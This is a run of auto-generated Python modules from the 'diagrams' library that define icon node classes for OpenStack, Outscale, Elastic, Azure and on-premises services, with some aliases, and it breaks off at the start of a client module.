diagrams/openstack/operations.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Operations(_OpenStack): _type = "operations" _icon_dir = "resources/openstack/operations" # Aliases File: diagrams/openstack/nfv.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _NFV(_OpenStack): _type = "nfv" _icon_dir = "resources/openstack/nfv" class Tacker(_NFV): _icon = "tacker.png" # Aliases File: diagrams/openstack/networking.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Networking(_OpenStack): _type = "networking" _icon_dir = "resources/openstack/networking" class Designate(_Networking): _icon = "designate.png" class Neutron(_Networking): _icon = "neutron.png" class Octavia(_Networking): _icon = "octavia.png" # Aliases File: diagrams/openstack/packaging.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Packaging(_OpenStack): _type = "packaging" _icon_dir = "resources/openstack/packaging" class LOCI(_Packaging): _icon = "loci.png" class Puppet(_Packaging): _icon = "puppet.png" class RPM(_Packaging): _icon = "rpm.png" # Aliases File: diagrams/openstack/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Storage(_OpenStack): _type = "storage" _icon_dir = "resources/openstack/storage" class Cinder(_Storage): _icon = "cinder.png" class Manila(_Storage): _icon = "manila.png" class Swift(_Storage): _icon = "swift.png" # Aliases File: diagrams/openstack/adjacentenablers.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Adjacentenablers(_OpenStack): _type = "adjacentenablers" _icon_dir = "resources/openstack/adjacentenablers" # Aliases File: diagrams/openstack/apiproxies.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Apiproxies(_OpenStack): _type = "apiproxies" _icon_dir = "resources/openstack/apiproxies" class EC2API(_Apiproxies): _icon = "ec2api.png" # Aliases File: diagrams/openstack/applicationlifecycle.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Applicationlifecycle(_OpenStack): _type = "applicationlifecycle" _icon_dir = "resources/openstack/applicationlifecycle" class Freezer(_Applicationlifecycle): _icon = "freezer.png" class Masakari(_Applicationlifecycle): _icon = "masakari.png" class Murano(_Applicationlifecycle): _icon = "murano.png" class Solum(_Applicationlifecycle): _icon = "solum.png" # Aliases File: diagrams/openstack/multiregion.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Multiregion(_OpenStack): _type = "multiregion" _icon_dir = "resources/openstack/multiregion" class Tricircle(_Multiregion): _icon = "tricircle.png" # Aliases File: diagrams/openstack/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Compute(_OpenStack): _type = "compute" _icon_dir = "resources/openstack/compute" class Nova(_Compute): _icon = "nova.png" class Qinling(_Compute): _icon = "qinling.png" class Zun(_Compute): _icon = "zun.png" # Aliases File: diagrams/outscale/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Outscale class _Security(_Outscale): _type = "security" _icon_dir = "resources/outscale/security" class Firewall(_Security): _icon = "firewall.png" class IdentityAndAccessManagement(_Security): _icon = "identity-and-access-management.png" # Aliases File: diagrams/outscale/__init__.py from diagrams import Node class _Outscale(Node): _provider = "outscale" _icon_dir = "resources/outscale" fontcolor = "#ffffff" File: diagrams/outscale/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Outscale class _Storage(_Outscale): _type = "storage" _icon_dir = "resources/outscale/storage" class SimpleStorageService(_Storage): _icon = "simple-storage-service.png" class Storage(_Storage): _icon = "storage.png" # Aliases File: diagrams/outscale/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Outscale class _Network(_Outscale): _type = "network" _icon_dir = "resources/outscale/network" class ClientVpn(_Network): _icon = "client-vpn.png" class InternetService(_Network): _icon = "internet-service.png" class LoadBalancer(_Network): _icon = "load-balancer.png" class NatService(_Network): _icon = "nat-service.png" class Net(_Network): _icon = "net.png" class SiteToSiteVpng(_Network): _icon = "site-to-site-vpng.png" # Aliases File: diagrams/outscale/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Outscale class _Compute(_Outscale): _type = "compute" _icon_dir = "resources/outscale/compute" class Compute(_Compute): _icon = "compute.png" class DirectConnect(_Compute): _icon = "direct-connect.png" # Aliases File: diagrams/elastic/elasticsearch.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Elastic class _Elasticsearch(_Elastic): _type = "elasticsearch" _icon_dir = "resources/elastic/elasticsearch" class Alerting(_Elasticsearch): _icon = "alerting.png" class Beats(_Elasticsearch): _icon = "beats.png" class Elasticsearch(_Elasticsearch): _icon = "elasticsearch.png" class Kibana(_Elasticsearch): _icon = "kibana.png" class LogstashPipeline(_Elasticsearch): _icon = "logstash-pipeline.png" class Logstash(_Elasticsearch): _icon = "logstash.png" class MachineLearning(_Elasticsearch): _icon = "machine-learning.png" class MapServices(_Elasticsearch): _icon = "map-services.png" class Maps(_Elasticsearch): _icon = "maps.png" class Monitoring(_Elasticsearch): _icon = "monitoring.png" class SearchableSnapshots(_Elasticsearch): _icon = "searchable-snapshots.png" class SecuritySettings(_Elasticsearch): _icon = "security-settings.png" class SQL(_Elasticsearch): _icon = "sql.png" class Stack(_Elasticsearch): _icon = "stack.png" # Aliases ElasticSearch = Elasticsearch LogStash = Logstash ML = MachineLearning File: diagrams/elastic/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Elastic class _Security(_Elastic): _type = "security" _icon_dir = "resources/elastic/security" class Endpoint(_Security): _icon = "endpoint.png" class Security(_Security): _icon = "security.png" class SIEM(_Security): _icon = "siem.png" class Xdr(_Security): _icon = "xdr.png" # Aliases File: diagrams/elastic/saas.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Elastic class _Saas(_Elastic): _type = "saas" _icon_dir = "resources/elastic/saas" class Cloud(_Saas): _icon = "cloud.png" class Elastic(_Saas): _icon = "elastic.png" # Aliases File: diagrams/elastic/__init__.py """ Elastic provides a set of general elastic services. """ from diagrams import Node class _Elastic(Node): _provider = "elastic" _icon_dir = "resources/elastic" fontcolor = "#ffffff" File: diagrams/elastic/observability.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Elastic class _Observability(_Elastic): _type = "observability" _icon_dir = "resources/elastic/observability" class APM(_Observability): _icon = "apm.png" class Logs(_Observability): _icon = "logs.png" class Metrics(_Observability): _icon = "metrics.png" class Observability(_Observability): _icon = "observability.png" class Uptime(_Observability): _icon = "uptime.png" # Aliases File: diagrams/elastic/orchestration.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Elastic class _Orchestration(_Elastic): _type = "orchestration" _icon_dir = "resources/elastic/orchestration" class ECE(_Orchestration): _icon = "ece.png" class ECK(_Orchestration): _icon = "eck.png" # Aliases File: diagrams/elastic/beats.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Elastic class _Beats(_Elastic): _type = "beats" _icon_dir = "resources/elastic/beats" class APM(_Beats): _icon = "apm.png" class Auditbeat(_Beats): _icon = "auditbeat.png" class Filebeat(_Beats): _icon = "filebeat.png" class Functionbeat(_Beats): _icon = "functionbeat.png" class Heartbeat(_Beats): _icon = "heartbeat.png" class Metricbeat(_Beats): _icon = "metricbeat.png" class Packetbeat(_Beats): _icon = "packetbeat.png" class Winlogbeat(_Beats): _icon = "winlogbeat.png" # Aliases File: diagrams/elastic/agent.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Elastic class _Agent(_Elastic): _type = "agent" _icon_dir = "resources/elastic/agent" class Agent(_Agent): _icon = "agent.png" class Endpoint(_Agent): _icon = "endpoint.png" class Fleet(_Agent): _icon = "fleet.png" class Integrations(_Agent): _icon = "integrations.png" # Aliases File: diagrams/elastic/enterprisesearch.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Elastic class _Enterprisesearch(_Elastic): _type = "enterprisesearch" _icon_dir = "resources/elastic/enterprisesearch" class AppSearch(_Enterprisesearch): _icon = "app-search.png" class Crawler(_Enterprisesearch): _icon = "crawler.png" class EnterpriseSearch(_Enterprisesearch): _icon = "enterprise-search.png" class SiteSearch(_Enterprisesearch): _icon = "site-search.png" class WorkplaceSearch(_Enterprisesearch): _icon = "workplace-search.png" # Aliases File: diagrams/azure/web.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Web(_Azure): _type = "web" _icon_dir = "resources/azure/web" class APIConnections(_Web): _icon = "api-connections.png" class AppServiceCertificates(_Web): _icon = "app-service-certificates.png" class AppServiceDomains(_Web): _icon = "app-service-domains.png" class AppServiceEnvironments(_Web): _icon = "app-service-environments.png" class AppServicePlans(_Web): _icon = "app-service-plans.png" class AppServices(_Web): _icon = "app-services.png" class MediaServices(_Web): _icon = "media-services.png" class NotificationHubNamespaces(_Web): _icon = "notification-hub-namespaces.png" class Search(_Web): _icon = "search.png" class Signalr(_Web): _icon = "signalr.png" # Aliases File: diagrams/azure/database.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Database(_Azure): _type = "database" _icon_dir = "resources/azure/database" class BlobStorage(_Database): _icon = "blob-storage.png" class CacheForRedis(_Database): _icon = "cache-for-redis.png" class CosmosDb(_Database): _icon = "cosmos-db.png" class DataExplorerClusters(_Database): _icon = "data-explorer-clusters.png" class DataFactory(_Database): _icon = "data-factory.png" class DataLake(_Database): _icon = "data-lake.png" class DatabaseForMariadbServers(_Database): _icon = "database-for-mariadb-servers.png" class DatabaseForMysqlServers(_Database): _icon = "database-for-mysql-servers.png" class DatabaseForPostgresqlServers(_Database): _icon = "database-for-postgresql-servers.png" class ElasticDatabasePools(_Database): _icon = "elastic-database-pools.png" class ElasticJobAgents(_Database): _icon = "elastic-job-agents.png" class InstancePools(_Database): _icon = "instance-pools.png" class ManagedDatabases(_Database): _icon = "managed-databases.png" class SQLDatabases(_Database): _icon = "sql-databases.png" class SQLDatawarehouse(_Database): _icon = "sql-datawarehouse.png" class SQLManagedInstances(_Database): _icon = "sql-managed-instances.png" class SQLServerStretchDatabases(_Database): _icon = "sql-server-stretch-databases.png" class SQLServers(_Database): _icon = "sql-servers.png" class SQLVM(_Database): _icon = "sql-vm.png" class SQL(_Database): _icon = "sql.png" class SsisLiftAndShiftIr(_Database): _icon = "ssis-lift-and-shift-ir.png" class SynapseAnalytics(_Database): _icon = "synapse-analytics.png" class VirtualClusters(_Database): _icon = "virtual-clusters.png" class VirtualDatacenter(_Database): _icon = "virtual-datacenter.png" # Aliases File: diagrams/azure/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Security(_Azure): _type = "security" _icon_dir = "resources/azure/security" class ApplicationSecurityGroups(_Security): _icon = "application-security-groups.png" class ConditionalAccess(_Security): _icon = "conditional-access.png" class Defender(_Security): _icon = "defender.png" class ExtendedSecurityUpdates(_Security): _icon = "extended-security-updates.png" class KeyVaults(_Security): _icon = "key-vaults.png" class SecurityCenter(_Security): _icon = "security-center.png" class Sentinel(_Security): _icon = "sentinel.png" # Aliases File: diagrams/azure/mobile.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Mobile(_Azure): _type = "mobile" _icon_dir = "resources/azure/mobile" class AppServiceMobile(_Mobile): _icon = "app-service-mobile.png" class MobileEngagement(_Mobile): _icon = "mobile-engagement.png" class NotificationHubs(_Mobile): _icon = "notification-hubs.png" # Aliases File: diagrams/azure/__init__.py """ Azure provides a set of services for Microsoft Azure provider. """ from diagrams import Node class _Azure(Node): _provider = "azure" _icon_dir = "resources/azure" fontcolor = "#ffffff" File: diagrams/azure/devops.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Devops(_Azure): _type = "devops" _icon_dir = "resources/azure/devops" class ApplicationInsights(_Devops): _icon = "application-insights.png" class Artifacts(_Devops): _icon = "artifacts.png" class Boards(_Devops): _icon = "boards.png" class Devops(_Devops): _icon = "devops.png" class DevtestLabs(_Devops): _icon = "devtest-labs.png" class LabServices(_Devops): _icon = "lab-services.png" class Pipelines(_Devops): _icon = "pipelines.png" class Repos(_Devops): _icon = "repos.png" class TestPlans(_Devops): _icon = "test-plans.png" # Aliases File: diagrams/azure/integration.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Integration(_Azure): _type = "integration" _icon_dir = "resources/azure/integration" class APIForFhir(_Integration): _icon = "api-for-fhir.png" class APIManagement(_Integration): _icon = "api-management.png" class AppConfiguration(_Integration): _icon = "app-configuration.png" class DataCatalog(_Integration): _icon = "data-catalog.png" class EventGridDomains(_Integration): _icon = "event-grid-domains.png" class EventGridSubscriptions(_Integration): _icon = "event-grid-subscriptions.png" class EventGridTopics(_Integration): _icon = "event-grid-topics.png" class IntegrationAccounts(_Integration): _icon = "integration-accounts.png" class IntegrationServiceEnvironments(_Integration): _icon = "integration-service-environments.png" class LogicAppsCustomConnector(_Integration): _icon = "logic-apps-custom-connector.png" class LogicApps(_Integration): _icon = "logic-apps.png" class PartnerTopic(_Integration): _icon = "partner-topic.png" class SendgridAccounts(_Integration): _icon = "sendgrid-accounts.png" class ServiceBusRelays(_Integration): _icon = "service-bus-relays.png" class ServiceBus(_Integration): _icon = "service-bus.png" class ServiceCatalogManagedApplicationDefinitions(_Integration): _icon = "service-catalog-managed-application-definitions.png" class SoftwareAsAService(_Integration): _icon = "software-as-a-service.png" class StorsimpleDeviceManagers(_Integration): _icon = "storsimple-device-managers.png" class SystemTopic(_Integration): _icon = "system-topic.png" # Aliases File: diagrams/azure/ml.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Ml(_Azure): _type = "ml" _icon_dir = "resources/azure/ml" class BatchAI(_Ml): _icon = "batch-ai.png" class BotServices(_Ml): _icon = "bot-services.png" class CognitiveServices(_Ml): _icon = "cognitive-services.png" class GenomicsAccounts(_Ml): _icon = "genomics-accounts.png" class MachineLearningServiceWorkspaces(_Ml): _icon = "machine-learning-service-workspaces.png" class MachineLearningStudioWebServicePlans(_Ml): _icon = "machine-learning-studio-web-service-plans.png" class MachineLearningStudioWebServices(_Ml): _icon = "machine-learning-studio-web-services.png" class MachineLearningStudioWorkspaces(_Ml): _icon = "machine-learning-studio-workspaces.png" # Aliases File: diagrams/azure/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Storage(_Azure): _type = "storage" _icon_dir = "resources/azure/storage" class ArchiveStorage(_Storage): _icon = "archive-storage.png" class Azurefxtedgefiler(_Storage): _icon = "azurefxtedgefiler.png" class BlobStorage(_Storage): _icon = "blob-storage.png" class DataBoxEdgeDataBoxGateway(_Storage): _icon = "data-box-edge-data-box-gateway.png" class DataBox(_Storage): _icon = "data-box.png" class DataLakeStorage(_Storage): _icon = "data-lake-storage.png" class GeneralStorage(_Storage): _icon = "general-storage.png" class NetappFiles(_Storage): _icon = "netapp-files.png" class QueuesStorage(_Storage): _icon = "queues-storage.png" class StorageAccountsClassic(_Storage): _icon = "storage-accounts-classic.png" class StorageAccounts(_Storage): _icon = "storage-accounts.png" class StorageExplorer(_Storage): _icon = "storage-explorer.png" class StorageSyncServices(_Storage): _icon = "storage-sync-services.png" class StorsimpleDataManagers(_Storage): _icon = "storsimple-data-managers.png" class StorsimpleDeviceManagers(_Storage): _icon = "storsimple-device-managers.png" class TableStorage(_Storage): _icon = "table-storage.png" # Aliases File: diagrams/azure/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Network(_Azure): _type = "network" _icon_dir = "resources/azure/network" class ApplicationGateway(_Network): _icon = "application-gateway.png" class ApplicationSecurityGroups(_Network): _icon = "application-security-groups.png" class CDNProfiles(_Network): _icon = "cdn-profiles.png" class Connections(_Network): _icon = "connections.png" class DDOSProtectionPlans(_Network): _icon = "ddos-protection-plans.png" class DNSPrivateZones(_Network): _icon = "dns-private-zones.png" class DNSZones(_Network): _icon = "dns-zones.png" class ExpressrouteCircuits(_Network): _icon = "expressroute-circuits.png" class Firewall(_Network): _icon = "firewall.png" class FrontDoors(_Network): _icon = "front-doors.png" class LoadBalancers(_Network): _icon = "load-balancers.png" class LocalNetworkGateways(_Network): _icon = "local-network-gateways.png" class NetworkInterfaces(_Network): _icon = "network-interfaces.png" class NetworkSecurityGroupsClassic(_Network): _icon = "network-security-groups-classic.png" class NetworkWatcher(_Network): _icon = "network-watcher.png" class OnPremisesDataGateways(_Network): _icon = "on-premises-data-gateways.png" class PrivateEndpoint(_Network): _icon = "private-endpoint.png" class PublicIpAddresses(_Network): _icon = "public-ip-addresses.png" class ReservedIpAddressesClassic(_Network): _icon = "reserved-ip-addresses-classic.png" class RouteFilters(_Network): _icon = "route-filters.png" class RouteTables(_Network): _icon = "route-tables.png" class ServiceEndpointPolicies(_Network): _icon = "service-endpoint-policies.png" class Subnets(_Network): _icon = "subnets.png" class TrafficManagerProfiles(_Network): _icon = "traffic-manager-profiles.png" class VirtualNetworkClassic(_Network): _icon = "virtual-network-classic.png" class VirtualNetworkGateways(_Network): _icon = "virtual-network-gateways.png" class VirtualNetworks(_Network): _icon = "virtual-networks.png" class VirtualWans(_Network): _icon = "virtual-wans.png" # Aliases File: diagrams/azure/analytics.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Analytics(_Azure): _type = "analytics" _icon_dir = "resources/azure/analytics" class AnalysisServices(_Analytics): _icon = "analysis-services.png" class DataExplorerClusters(_Analytics): _icon = "data-explorer-clusters.png" class DataFactories(_Analytics): _icon = "data-factories.png" class DataLakeAnalytics(_Analytics): _icon = "data-lake-analytics.png" class DataLakeStoreGen1(_Analytics): _icon = "data-lake-store-gen1.png" class Databricks(_Analytics): _icon = "databricks.png" class EventHubClusters(_Analytics): _icon = "event-hub-clusters.png" class EventHubs(_Analytics): _icon = "event-hubs.png" class Hdinsightclusters(_Analytics): _icon = "hdinsightclusters.png" class LogAnalyticsWorkspaces(_Analytics): _icon = "log-analytics-workspaces.png" class StreamAnalyticsJobs(_Analytics): _icon = "stream-analytics-jobs.png" class SynapseAnalytics(_Analytics): _icon = "synapse-analytics.png" # Aliases File: diagrams/azure/migration.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Migration(_Azure): _type = "migration" _icon_dir = "resources/azure/migration" class DataBoxEdge(_Migration): _icon = "data-box-edge.png" class DataBox(_Migration): _icon = "data-box.png" class DatabaseMigrationServices(_Migration): _icon = "database-migration-services.png" class MigrationProjects(_Migration): _icon = "migration-projects.png" class RecoveryServicesVaults(_Migration): _icon = "recovery-services-vaults.png" # Aliases File: diagrams/azure/identity.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Identity(_Azure): _type = "identity" _icon_dir = "resources/azure/identity" class AccessReview(_Identity): _icon = "access-review.png" class ActiveDirectoryConnectHealth(_Identity): _icon = "active-directory-connect-health.png" class ActiveDirectory(_Identity): _icon = "active-directory.png" class ADB2C(_Identity): _icon = "ad-b2c.png" class ADDomainServices(_Identity): _icon = "ad-domain-services.png" class ADIdentityProtection(_Identity): _icon = "ad-identity-protection.png" class ADPrivilegedIdentityManagement(_Identity): _icon = "ad-privileged-identity-management.png" class AppRegistrations(_Identity): _icon = "app-registrations.png" class ConditionalAccess(_Identity): _icon = "conditional-access.png" class EnterpriseApplications(_Identity): _icon = "enterprise-applications.png" class Groups(_Identity): _icon = "groups.png" class IdentityGovernance(_Identity): _icon = "identity-governance.png" class InformationProtection(_Identity): _icon = "information-protection.png" class ManagedIdentities(_Identity): _icon = "managed-identities.png" class Users(_Identity): _icon = "users.png" # Aliases File: diagrams/azure/iot.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Iot(_Azure): _type = "iot" _icon_dir = "resources/azure/iot" class DeviceProvisioningServices(_Iot): _icon = "device-provisioning-services.png" class DigitalTwins(_Iot): _icon = "digital-twins.png" class IotCentralApplications(_Iot): _icon = "iot-central-applications.png" class IotHubSecurity(_Iot): _icon = "iot-hub-security.png" class IotHub(_Iot): _icon = "iot-hub.png" class Maps(_Iot): _icon = "maps.png" class Sphere(_Iot): _icon = "sphere.png" class TimeSeriesInsightsEnvironments(_Iot): _icon = "time-series-insights-environments.png" class TimeSeriesInsightsEventsSources(_Iot): _icon = "time-series-insights-events-sources.png" class Windows10IotCoreServices(_Iot): _icon = "windows-10-iot-core-services.png" # Aliases File: diagrams/azure/general.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _General(_Azure): _type = "general" _icon_dir = "resources/azure/general" class Allresources(_General): _icon = "allresources.png" class Azurehome(_General): _icon = "azurehome.png" class Developertools(_General): _icon = "developertools.png" class Helpsupport(_General): _icon = "helpsupport.png" class Information(_General): _icon = "information.png" class Managementgroups(_General): _icon = "managementgroups.png" class Marketplace(_General): _icon = "marketplace.png" class Quickstartcenter(_General): _icon = "quickstartcenter.png" class Recent(_General): _icon = "recent.png" class Reservations(_General): _icon = "reservations.png" class Resource(_General): _icon = "resource.png" class Resourcegroups(_General): _icon = "resourcegroups.png" class Servicehealth(_General): _icon = "servicehealth.png" class Shareddashboard(_General): _icon = "shareddashboard.png" class Subscriptions(_General): _icon = "subscriptions.png" class Support(_General): _icon = "support.png" class Supportrequests(_General): _icon = "supportrequests.png" class Tag(_General): _icon = "tag.png" class Tags(_General): _icon = "tags.png" class Templates(_General): _icon = "templates.png" class Twousericon(_General): _icon = "twousericon.png" class Userhealthicon(_General): _icon = "userhealthicon.png" class Usericon(_General): _icon = "usericon.png" class Userprivacy(_General): _icon = "userprivacy.png" class Userresource(_General): _icon = "userresource.png" class Whatsnew(_General): _icon = "whatsnew.png" # Aliases File: diagrams/azure/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Azure class _Compute(_Azure): _type = "compute" _icon_dir = "resources/azure/compute" class AppServices(_Compute): _icon = "app-services.png" class AutomanagedVM(_Compute): _icon = "automanaged-vm.png" class AvailabilitySets(_Compute): _icon = "availability-sets.png" class BatchAccounts(_Compute): _icon = "batch-accounts.png" class CitrixVirtualDesktopsEssentials(_Compute): _icon = "citrix-virtual-desktops-essentials.png" class CloudServicesClassic(_Compute): _icon = "cloud-services-classic.png" class CloudServices(_Compute): _icon = "cloud-services.png" class CloudsimpleVirtualMachines(_Compute): _icon = "cloudsimple-virtual-machines.png" class ContainerApps(_Compute): _icon = "container-apps.png" class ContainerInstances(_Compute): _icon = "container-instances.png" class ContainerRegistries(_Compute): _icon = "container-registries.png" class DiskEncryptionSets(_Compute): _icon = "disk-encryption-sets.png" class DiskSnapshots(_Compute): _icon = "disk-snapshots.png" class Disks(_Compute): _icon = "disks.png" class FunctionApps(_Compute): _icon = "function-apps.png" class ImageDefinitions(_Compute): _icon = "image-definitions.png" class ImageVersions(_Compute): _icon = "image-versions.png" class KubernetesServices(_Compute): _icon = "kubernetes-services.png" class MeshApplications(_Compute): _icon = "mesh-applications.png" class OsImages(_Compute): _icon = "os-images.png" class SAPHANAOnAzure(_Compute): _icon = "sap-hana-on-azure.png" class ServiceFabricClusters(_Compute): _icon = "service-fabric-clusters.png" class SharedImageGalleries(_Compute): _icon = "shared-image-galleries.png" class SpringCloud(_Compute): _icon = "spring-cloud.png" class VMClassic(_Compute): _icon = "vm-classic.png" class VMImages(_Compute): _icon = "vm-images.png" class VMLinux(_Compute): _icon = "vm-linux.png" class VMScaleSet(_Compute): _icon = "vm-scale-set.png" class VMWindows(_Compute): _icon = "vm-windows.png" class VM(_Compute): _icon = "vm.png" class Workspaces(_Compute): _icon = "workspaces.png" # Aliases ACR = ContainerRegistries AKS = KubernetesServices VMSS = VMScaleSet File: diagrams/onprem/queue.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Queue(_OnPrem): _type = "queue" _icon_dir = "resources/onprem/queue" class Activemq(_Queue): _icon = "activemq.png" class Celery(_Queue): _icon = "celery.png" class Emqx(_Queue): _icon = "emqx.png" class Kafka(_Queue): _icon = "kafka.png" class Nats(_Queue): _icon = "nats.png" class Rabbitmq(_Queue): _icon = "rabbitmq.png" class Zeromq(_Queue): _icon = "zeromq.png" # Aliases ActiveMQ = Activemq EMQX = Emqx RabbitMQ = Rabbitmq ZeroMQ = Zeromq File: diagrams/onprem/auth.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Auth(_OnPrem): _type = "auth" _icon_dir = "resources/onprem/auth" class Boundary(_Auth): _icon = "boundary.png" class BuzzfeedSso(_Auth): _icon = "buzzfeed-sso.png" class Oauth2Proxy(_Auth): _icon = "oauth2-proxy.png" # Aliases File: diagrams/onprem/etl.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Etl(_OnPrem): _type = "etl" _icon_dir = "resources/onprem/etl" class Embulk(_Etl): _icon = "embulk.png" # Aliases File: diagrams/onprem/logging.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Logging(_OnPrem): _type = "logging" _icon_dir = "resources/onprem/logging" class Fluentbit(_Logging): _icon = "fluentbit.png" class Graylog(_Logging): _icon = "graylog.png" class Loki(_Logging): _icon = "loki.png" class Rsyslog(_Logging): _icon = "rsyslog.png" class SyslogNg(_Logging): _icon = "syslog-ng.png" # Aliases FluentBit = Fluentbit RSyslog = Rsyslog File: diagrams/onprem/tracing.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Tracing(_OnPrem): _type = "tracing" _icon_dir = "resources/onprem/tracing" class Jaeger(_Tracing): _icon = "jaeger.png" class Tempo(_Tracing): _icon = "tempo.png" # Aliases File: diagrams/onprem/dns.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Dns(_OnPrem): _type = "dns" _icon_dir = "resources/onprem/dns" class Coredns(_Dns): _icon = "coredns.png" class Powerdns(_Dns): _icon = "powerdns.png" # Aliases File: diagrams/onprem/gitops.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Gitops(_OnPrem): _type = "gitops" _icon_dir = "resources/onprem/gitops" class Argocd(_Gitops): _icon = "argocd.png" class Flagger(_Gitops): _icon = "flagger.png" class Flux(_Gitops): _icon = "flux.png" # Aliases ArgoCD = Argocd File: diagrams/onprem/aggregator.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Aggregator(_OnPrem): _type = "aggregator" _icon_dir = "resources/onprem/aggregator" class Fluentd(_Aggregator): _icon = "fluentd.png" class Vector(_Aggregator): _icon = "vector.png" # Aliases File: diagrams/onprem/registry.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Registry(_OnPrem): _type = "registry" _icon_dir = "resources/onprem/registry" class Harbor(_Registry): _icon = "harbor.png" class Jfrog(_Registry): _icon = "jfrog.png" # Aliases File: diagrams/onprem/ci.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Ci(_OnPrem): _type = "ci" _icon_dir = "resources/onprem/ci" class Circleci(_Ci): _icon = "circleci.png" class Concourseci(_Ci): _icon = "concourseci.png" class Droneci(_Ci): _icon = "droneci.png" class GithubActions(_Ci): _icon = "github-actions.png" class Gitlabci(_Ci): _icon = "gitlabci.png" class Jenkins(_Ci): _icon = "jenkins.png" class Teamcity(_Ci): _icon = "teamcity.png" class Travisci(_Ci): _icon = "travisci.png" class Zuulci(_Ci): _icon = "zuulci.png" # Aliases CircleCI = Circleci ConcourseCI = Concourseci DroneCI = Droneci GitlabCI = Gitlabci TravisCI = Travisci TC = Teamcity ZuulCI = Zuulci File: diagrams/onprem/monitoring.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Monitoring(_OnPrem): _type = "monitoring" _icon_dir = "resources/onprem/monitoring" class Cortex(_Monitoring): _icon = "cortex.png" class Datadog(_Monitoring): _icon = "datadog.png" class Dynatrace(_Monitoring): _icon = "dynatrace.png" class Grafana(_Monitoring): _icon = "grafana.png" class Humio(_Monitoring): _icon = "humio.png" class Mimir(_Monitoring): _icon = "mimir.png" class Nagios(_Monitoring): _icon = "nagios.png" class Newrelic(_Monitoring): _icon = "newrelic.png" class PrometheusOperator(_Monitoring): _icon = "prometheus-operator.png" class Prometheus(_Monitoring): _icon = "prometheus.png" class Sentry(_Monitoring): _icon = "sentry.png" class Splunk(_Monitoring): _icon = "splunk.png" class Thanos(_Monitoring): _icon = "thanos.png" class Zabbix(_Monitoring): _icon = "zabbix.png" # Aliases File: diagrams/onprem/database.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Database(_OnPrem): _type = "database" _icon_dir = "resources/onprem/database" class Cassandra(_Database): _icon = "cassandra.png" class Clickhouse(_Database): _icon = "clickhouse.png" class Cockroachdb(_Database): _icon = "cockroachdb.png" class Couchbase(_Database): _icon = "couchbase.png" class Couchdb(_Database): _icon = "couchdb.png" class Dgraph(_Database): _icon = "dgraph.png" class Druid(_Database): _icon = "druid.png" class Hbase(_Database): _icon = "hbase.png" class Influxdb(_Database): _icon = "influxdb.png" class Janusgraph(_Database): _icon = "janusgraph.png" class Mariadb(_Database): _icon = "mariadb.png" class Mongodb(_Database): _icon = "mongodb.png" class Mssql(_Database): _icon = "mssql.png" class Mysql(_Database): _icon = "mysql.png" class Neo4J(_Database): _icon = "neo4j.png" class Oracle(_Database): _icon = "oracle.png" class Postgresql(_Database): _icon = "postgresql.png" class Scylla(_Database): _icon = "scylla.png" # Aliases ClickHouse = Clickhouse CockroachDB = Cockroachdb CouchDB = Couchdb HBase = Hbase InfluxDB = Influxdb JanusGraph = Janusgraph MariaDB = Mariadb MongoDB = Mongodb MSSQL = Mssql MySQL = Mysql PostgreSQL = Postgresql File: diagrams/onprem/client.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem 